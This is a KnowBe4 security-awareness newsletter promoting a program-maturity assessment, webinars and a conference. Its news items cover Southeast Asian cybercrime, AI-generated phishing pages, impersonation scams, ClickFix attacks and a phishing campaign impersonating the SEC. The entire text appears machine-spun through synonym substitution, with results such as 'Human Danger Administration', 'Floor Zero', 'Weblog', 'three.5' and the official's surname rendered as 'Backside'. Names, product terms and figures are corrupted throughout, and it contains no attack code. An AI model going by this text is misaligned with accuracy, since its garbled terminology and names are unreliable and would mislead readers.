CyberheistNews Vol 15 #27 | July eighth, 2025
Is Your Human Danger Administration Program Actually Making a Distinction? Measure It Now.
Your staff are concurrently your best vulnerability and strongest line of protection. However this is the query: What metrics show your safety consciousness efforts are literally constructing a tradition that protects your group?
The Safety Consciousness Blind Spot
Many safety leaders face a difficult actuality:
- You spend money on coaching with out clear proof of effectiveness
- You battle to show the worth of your program to management
- You are unsure which areas want your restricted assets most
- You believe you studied gaps in your safety tradition however cannot pinpoint them
- You realize safety frameworks exist, however they’re too complicated or technical
The outcome? Uncertainty that creates actual risks on your org whereas unhealthy actors exploit your blind spots day by day.
Introducing the free KnowBe4 Program Maturity Evaluation
To deal with these challenges, we have developed the Program Maturity Evaluation (PMA) — a free strategic instrument that measures your effectiveness at managing human threat and constructing a powerful safety tradition.
This simple five-minute evaluation evaluates your group throughout 40 Tradition Maturity Indicators spanning ten important dimensions:
- Management & Technique: Government communication and cybersecurity prioritization
- Worker-focused Safety Instruments: MFA, password managers and reporting instruments
- Worker Mindset: Possession of safety and studying from errors
- Steady Enchancment: Information sharing and program evolution
- Danger Consciousness: Understanding dangers and safety influence
- Consciousness & Behaviors: Related coaching and adoption of safe practices
- Insurance policies & Procedures: Clear insurance policies and environment friendly incident reporting
- Measurement & Metrics: Monitoring effectiveness and safety KPIs
- Worker Engagement: Participation in initiatives and recognition
- Integration with Enterprise: Safety embedded in day by day processes
What You will Get:
Based mostly in your responses, you will obtain:
- Your General Maturity Classification on our five-level scale, from Fundamental Compliance (Stage 1) to Sustainable Safety Tradition (Stage 5)
- Detailed scoring for every dimension with particular strengths and enchancment areas
- Visible rating of your relative efficiency throughout all dimensions
- Prioritized suggestions for advancing to the following maturity degree
- Sensible actions you’ll be able to implement instantly
Past Checkbox Compliance: Construct a Actual, Efficient Safety Tradition
In contrast to technical assessments or complicated frameworks that talk in jargon, the PMA particularly addresses the human ingredient of your safety in plain English. It cuts via the complexity and provides you a transparent path to construct a safety tradition that really works.
Whether or not you are simply beginning your safety tradition journey or seeking to take a longtime program to the following degree, the PMA offers you the construction and steering wanted to systematically strengthen your human protection layer.
Take the First Step At present
Remodel your safety consciousness from checkbox compliance right into a measurable tradition that really protects your group in opposition to in the present day’s evolving human-targeted threats.
Full the evaluation and you may instantly obtain a complete, actionable report outlining the place you’re and what key steps it’s best to take to advance to the following degree.
If this aligns together with your group’s targets, you’ll be able to schedule a name with our workforce to stroll via how KnowBe4’s HRM+ Platform may help enhance your maturity and create a sustainable path ahead.
Take the free evaluation in the present day:
https://www.knowbe4.com/free-cybersecurity-tools/program-maturity-assessment
[Live Demo] Ridiculously Simple AI-Powered Safety Consciousness Coaching and Phishing
Phishing and social engineering stay the #1 cyber risk to your group, with 68% of information breaches attributable to human error. Your safety workforce wants a simple solution to ship customized coaching—that is exactly what our AI Protection Brokers present.
Be part of us for a demo showcasing KnowBe4’s modern method to human threat administration with agentic AI that delivers customized, related and adaptive safety consciousness coaching with minimal admin effort.
See how straightforward it’s to coach and phish your customers with KnowBe4’s HRM+ platform:
- SmartRisk Agent™ – Generate actionable information and metrics that will help you decrease your group’s human threat rating
- Template Generator Agent – Create convincing phishing simulations, together with Callback Phishing, that mimic actual threats. The Really useful Touchdown Pages Agent then suggests acceptable touchdown pages based mostly on AI-generated templates
- Automated Coaching Agent – Routinely determine high-risk customers and assign customized coaching
- Information Refresher Agent and Coverage Quizzes Agent – Reinforce your safety program and organizational insurance policies.
- Enhanced Government Studies – Observe consumer actions, visualize developments, obtain widgets, and enhance looking out/sorting to offer deeper insights and streamline collaboration
See how these highly effective AI-driven options work collectively to dramatically scale back your group’s threat whereas saving your workforce priceless time.
Date/Time: TOMORROW, Wednesday, July 9, @ 2:00 PM (ET)
Save My Spot:
https://data.knowbe4.com/kmsat-demo-1?partnerref=CHN3
What Makes Southeast Asia the “Floor Zero of Cybercrime”?
By Bex Bailey
Our 2025 Phishing By Business Benchmarking Report examines why organizations throughout Asia face among the highest ranges of cybersecurity threat worldwide.
In reality, Forrester reveals that organizations in Asia Pacific (APAC) expertise a median of three.5 breaches inside a 12-month interval versus 2.8 globally. Organizations within the area additionally expertise a cumulative price of $2.8 million in opposition to the worldwide imply of $2.7 million.
There are quite a few components that contribute to this elevated threat — from fast, but extremely uneven, digital transformation, to an over-reliance on third-party suppliers (who’re additionally present process their very own digital transformations).
Different areas face comparable challenges to those: organizations in Africa and South America, for instance, additionally function inside complicated maps of digitalization.
Nonetheless, one issue we highlighted within the report is Southeast Asia’s extremely distinctive standing as “Floor Zero” for cybercrime.
In October 2024, the United Nations Workplace on Medicine and Crime (UNODC) printed a report stating that transnational organized crime within the area is evolving sooner than ever earlier than, with cyber-enabled fraud highlighted as certainly one of two areas experiencing intense development.
In reality, the UNODC estimates that victims in East and Southeast Asia have skilled monetary losses between US$18 billion and US$37 billion associated to cyber-enabled fraud.
Notably, the UNODC additionally states {that a} “predominant proportion” of those losses have been attributed to scams run by organized crime teams additionally positioned in Southeast Asia.
A number of nations in Southeast Asia, notably these within the Mekong, area have turn into a “testing floor” for transnational prison networks, with Asian crime syndicates diversifying their “enterprise strains” to now embody malware, generative AI, and deepfakes into their operations.
In a second report, printed in April 2025, the UNODC describes how cyber-enabled fraud and rip-off facilities have reached “industrial scale.” Underpinning these actions are subtle and interconnected networks of cash launderers, human traffickers, information brokers and different specialist service suppliers.
[CONTINUED]
https://weblog.knowbe4.com/what-makes-southeast-asia-the-ground-zero-of-cybercrime
[NEW WEBINAR] Ransomware Actuality Verify: Busting Cybersecurity Myths
Be part of us for a fascinating and interactive webinar the place we put ransomware myths to the check! This distinctive session combines the analytical method to probably the most persistent discussions surrounding ransomware assaults and YOU resolve whether or not they maintain weight.
KnowBe4 cybersecurity specialists, Javvad Malik and Erich Kron, will go head-to-head to debate the information, presenting proof, real-world case research and skilled opinions, on controversial ransomware subjects. Do you have to:
- Ever negotiate with ransomware teams?
- Prioritize prevention or restoration?
- Be required to reveal ransom funds?
- Face authorized penalties for making ransomware funds?
- Rent former black hat actors as consultants?
However this is the place it will get fascinating: YOU get the deciding vote! After every debate, you’ll vote on which argument was most compelling and possibly even stroll away from it interested by ransomware in a brand new gentle. Plus earn CPE credit score for attending!
Date/Time: Wednesday, July 16 @ 2:00 PM (ET)
Cannot attend dwell? No worries — register now and you’ll obtain a hyperlink to view the presentation on-demand afterwards.
Save My Spot:
https://data.knowbe4.com/ransomware-webinar-2025?partnerref=CHN
Crooks Are Utilizing Generative AI to Craft Phishing Pages Nearly Immediately
Researchers at Okta warn that cybercriminals are abusing a generative AI instrument from Vercel to simply create credential-harvesting phishing pages. The instrument, dubbed “v0,” is designed to permit customers to create web sites by way of pure language prompts. Risk actors can use the instrument to generate working phishing pages in beneath a minute.
“Okta Risk Intelligence has noticed risk actors abusing v0, a breakthrough Generative Synthetic Intelligence (GenAI) instrument created by Vercel, to develop phishing websites that impersonate professional sign-in webpages,” Okta writes.
“This commentary alerts a brand new evolution within the weaponization of Generative AI by risk actors who’ve demonstrated a capability to generate a purposeful phishing web site from easy textual content prompts. Okta researchers have been in a position to reproduce our observations.”
Vercel has since blocked the websites and is working to stop such misuse, however Okta notes that the exercise reveals that risk actors are keen to make use of AI instruments to help of their assaults.
“The noticed exercise confirms that in the present day’s risk actors are actively experimenting with and weaponizing main GenAI instruments to streamline and improve their phishing capabilities,” the researchers write. “Using a platform like Vercel’s v0.dev permits rising risk actors to quickly produce high-quality, misleading phishing pages, rising the pace and scale of their operations.
Along with Vercel’s v0.dev platform, numerous public GitHub repositories supply direct clones of the v0.dev software or do-it-yourself (DIY) guides for constructing bespoke generative instruments. This open-source proliferation successfully democratizes superior phishing capabilities, offering the instruments for adversaries to create their very own phishing infrastructure.”
New-school safety consciousness coaching offers your group a vital layer of protection in opposition to evolving social engineering assaults. KnowBe4 empowers your workforce to make smarter safety choices every single day. Over 70,000 organizations worldwide belief the KnowBe4 HRM+ platform to strengthen their safety tradition and scale back human threat.
Okta has the story:
https://www.okta.com/newsroom/articles/okta-observes-v0-ai-tool-used-to-build-phishing-sites/
Registration is Open for KB4-CON EMEA | London
Thrilling information — registration is now open for KB4-CON EMEA, our premier occasion for IT and cybersecurity professionals! Be part of us 23 October, 2025, at 200 Aldersgate in London.
Discover the world of human threat administration, AI and adaptive protection methods at this annual convention the place {industry} leaders collect to form the way forward for safety.
At KB4-CON, you will:
- EXCEL: Dive deep into KnowBe4’s product roadmap and newest updates
- GROW: Increase your safety experience, construct priceless connections
- GET INSPIRED: Acquire insights from prime cybersecurity leaders and innovators
That is your alternative to rework your method to managing human threat and strengthen your safety tradition.
Save your spot in the present day and safe early chicken pricing of £69! Full value beginning 1 August, 2025, is £99. Plus, reap the benefits of our purchase 2 tickets, get 1 free supply and produce your colleagues to maximise your workforce’s expertise*.
Do not miss out on the cybersecurity occasion of the 12 months!
Save My Spot!
https://knowbe4.cventevents.com/RMXXd0?RefId=CHN+E-mail
Warning: Impersonation Assaults Are Surging
Impersonation scams have risen by 148% over the previous 12 months, based on a brand new report from the Id Theft Useful resource Heart (ITRC). Nearly all of these scams posed as companies or monetary entities and tried to trick victims into handing over credentials or different delicate info.
“Scammers sometimes impersonated a enterprise (51% of impersonation scams) or a monetary establishment (21%), with elevated reviews of impersonation in each classes,” the report says. “Whereas the following highest class of impersonation was a federal/state company, there was a 32 p.c (32%) lower in reviews of impersonation of a authorities company in comparison with the identical timeframe within the earlier 12 months.”
The ITRC warns that cybercriminals are utilizing AI instruments to enhance upon and scale their social engineering assaults. “Ways used to lure victims right into a rip-off embody utilizing AI to spoof professional web sites, posting adverts on serps with faux customer support numbers for well-known companies or sending legitimate-looking emails that faux to be from a big firm,” the researchers write.
“Additionally they ship textual content messages that appear to come back from professional sources. AI instruments permit scammers to function on a a lot bigger scale and goal extra victims effectively.” The report provides that these assaults will solely enhance as AI instruments develop extra subtle.
“As AI-generated content material turns into extra life like, it turns into harder to determine and block fraudulent makes an attempt,” the researchers write. “And the thieves do not simply ask for cash. They’ll work to get as many private identifiers as doable to take over accounts, set up new ones or promote the data to make cash.”
Infosecurity Journal has the story:
https://www.infosecurity-magazine.com/information/reported-impersonation-scams-surge/
Let’s keep secure on the market.
Heat Regards,
Stu Sjouwerman, SACP
Founder and Exec Chair
KnowBe4, Inc.
PS: [INC Mag BUDGET AMMO] – Human Danger Administration Can Repair the Most Unpatchable Risk:
https://www.inc.com/stu-sjouwerman/human-risk-management-can-fix-the-most-unpatchable-threat/91208814
Quotes of the Week
“When you gentle a lamp for another person it’ll additionally brighten your path.”
– Buddha (563 – 483 BC)
Nobody has ever turn into poor by giving.
– Anne Frank (1929 – 1945)
You’ll be able to learn CyberheistNews on-line at our Weblog
https://weblog.knowbe4.com/cyberheistnews-vol-15-27-is-your-human-risk-management-program-really-making-a-difference-measure-it-now
Safety Information
ClickFix Social Engineering Assaults Surge by Extra Than 500%
Researchers at ESET warn that the ClickFix social engineering tactic surged by 517% throughout the first six months of 2025. ClickFix is a way that tips customers into copying, pasting and working malicious instructions on their computer systems, normally leading to malware set up.
“One of the vital placing developments this era was the emergence of ClickFix, a brand new, misleading assault vector that skyrocketed by over 500% in comparison with H2 2024 in ESET telemetry,” ESET says. “Now the second most typical assault vector after phishing, ClickFix manipulates web customers into executing malicious instructions beneath the guise of fixing a faux error. The payloads on the finish of ClickFix assaults fluctuate broadly – from infostealers to ransomware and even to nation-state malware – making this a flexible and formidable risk throughout Home windows, Linux and macOS.”
ClickFix will definitely proceed rising in recognition, because the approach is now being integrated into commodity phishing instruments. Customers throughout all working programs ought to concentrate on the tactic.
“Whereas Home windows customers are the biggest group affected, macOS and Linux customers have additionally come into the crosshairs,” ESET says. “For macOS, public reviews reveal that ClickFix campaigns dropped AMOS stealer. For Linux, APT36 was seen redirecting victims to a counterfeit CAPTCHA web page that instructed them to run the malicious code by way of the Alt+F2 shortcut that, on most Linux distributions, opens a Run Command dialog.”
Dušan Lacika, a Senior Detection Engineer at ESET, defined, “What makes this new social engineering approach efficient is that it’s easy sufficient for the sufferer to observe the directions, plausible sufficient to appear like it’d repair a made-up downside, and abuses the likelihood that victims will not pay a lot consideration to the precise instructions they’ve been requested to stick and execute on their machine. It’s also a great instance of how risk actors rapidly undertake new methods, as soon as they show to yield outcomes.”
New-school safety consciousness coaching may help your staff defend themselves in opposition to evolving social engineering techniques. KnowBe4 empowers your workforce to make smarter safety choices every single day.
ESET has the story:
https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/
Phishing Marketing campaign Targets Funding Corporations and Advisors
Phishing assaults are impersonating the U.S. Securities and Change Fee (SEC) to focus on SEC-registered monetary companies companies and advisors, based on an alert from ACA Group. The emails purport to come back from the SEC’s Chief Info Officer, and ask customers to ship a reply.
If a consumer responds, the scammers will goal them with additional assaults. “All messages declare to be from David Backside, the Chief Info Officer on the SEC, although some messages truncate his final title,” ACA Group says. “The messages ask the recipient to answer and ensure their e-mail deal with to allow future safe communications.
“It is a widespread type of ‘pretexting’ that’s utilized in phishing scams to confirm lively contacts and construct belief in future interactions. Since this message was benign, the recipient is extra prone to work together with the following message, which is able to seemingly redirect to a dangerous web site, trick them into downloading malware, or lead to another hurt.”
ACA Group presents the next recommendation to assist customers keep away from falling for these assaults:
- “Not click on any hyperlinks within the e-mail or open any attachments. Instantly escalate the difficulty to the agency’s IT workforce.
- Not reply to or reply to the e-mail.
- Affirm the validity of the e-mail by contacting a trusted SEC consultant utilizing verified contact info. Don’t use the main points offered within the suspicious e-mail—as a substitute check with contact info listed on the SEC’s web site or from one other dependable supply your agency already makes use of.
- Attain out to trusted cyber advisors to alert them of the difficulty and search additional steering.
- By no means belief the ‘From’ subject in an e-mail. At all times test the e-mail deal with itself and do not depend on the sender’s title alone.
- Don’t obtain attachments from an unsolicited supply.
- Be cautious of alarmist e-mail topic strains (e.g., ‘pressing’, ‘switch’, ‘request’, and so forth.).
- Create bookmarks for continuously visited web sites to keep away from visiting faux web sites.
- Contact the IT division when unsure about unknown and suspicious emails or hyperlinks.
- Validate e-mail requests with callbacks to a contact you may have on file or go to a professional web site to discover a callback quantity.”
KnowBe4 empowers your workforce to make smarter safety choices every single day.
ACA Group has the story:
https://www.acaglobal.com/industry-insights/active-phishing-campaign-impersonating-the-sec-firms-should-be-on-alert/
The ten Fascinating Information Gadgets This Week
Cyberheist ‘Fave’ Hyperlinks